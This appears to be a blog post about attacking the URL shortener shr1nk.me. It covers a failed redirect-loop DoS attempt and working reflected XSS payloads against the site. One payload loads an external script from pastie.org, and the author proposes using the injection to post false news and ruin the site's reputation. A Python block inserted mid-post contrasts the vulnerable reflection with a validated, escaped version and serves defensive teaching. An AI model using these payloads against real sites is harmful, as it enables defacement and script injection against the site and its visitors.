OK, first I discovered that I can shrink links from the website itself, so an evil idea came to my mind: a DoS attack. I wanted to make the web server loop infinitely to find the website. For example, I shortened the URL http://shr1nk.me/1235 and pointed it to http://shr1nk.me/1234, and vice versa.
I thought this would make the server loop over and over to find the original link, but nah, it doesn’t work like that: the server just sends the original (the shortened) URL back to the browser, and it’s the browser’s job to fetch the new URL. So this is useless, because even the browser detects redirect loops (5 loops and it breaks the request): http://en.wikipedia.org/wiki/URL_redirection#Redirect_loops
Now to XSS: a simple check shows that the website is XSS’able. Here’s a simple alert() test: http://shr1nk.me/index.php?url="></a><script>alert(1)</script>. It doesn’t work for me in Google Chrome, so use Firefox.
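The alert() test succeeds because the `url` parameter is written into the page's HTML without encoding, so `">` closes the link attribute it lands in. The following is an added example, not code from this post or from shr1nk.me: the page template and function names are assumptions, and Python stands in for the site's PHP to show the raw reflection beside a hardened version.

```python
import html
from urllib.parse import urlsplit

# Constructed input: the `url` query parameter from the test link above,
# as the server sees it after URL-decoding.
PAYLOAD = '"></a><script>alert(1)</script>'

ALLOWED_SCHEMES = {"http", "https"}


def render_vulnerable(url: str) -> str:
    """Assumed shape of the flawed page: the parameter is pasted in raw."""
    return '<a href="' + url + '">' + url + '</a>'


def is_acceptable_target(url: str) -> bool:
    """Accept only absolute http(s) URLs with a host and no markup characters."""
    if any(ch in '"\'<>' or ch.isspace() for ch in url):
        return False
    try:
        parts = urlsplit(url)
    except ValueError:  # e.g. malformed IPv6 literal
        return False
    return parts.scheme in ALLOWED_SCHEMES and bool(parts.netloc)


def render_hardened(url: str) -> str:
    """Validate first, then HTML-encode for both the attribute and the text."""
    if not is_acceptable_target(url):
        return "<p>Invalid URL</p>"
    # Escaping alone does not constrain the scheme, hence the check above.
    safe = html.escape(url, quote=True)
    return '<a href="' + safe + '">' + safe + '</a>'


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(PAYLOAD))
    print("hardened:  ", render_hardened(PAYLOAD))
    print("hardened:  ", render_hardened("https://example.com/?a=1&b=2"))
```
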
Let’s explore 3 categories of attacks that can be carried out using XSS; of course, combining these techniques will have a bigger impact.
Reputation: We can make a website’s reputation as bad as we want by inserting inappropriate content, posting false news, etc. Remember: users have to click your link to see this, because it is not a persistent XSS attack.
For example, if you click this link, http://shr1nk.me/index.php?url=%22%3E%3C/a%3E%3Cscript%20src=http://pastie.org/868120.txt%3E%3C/script%3E, you should get something like this.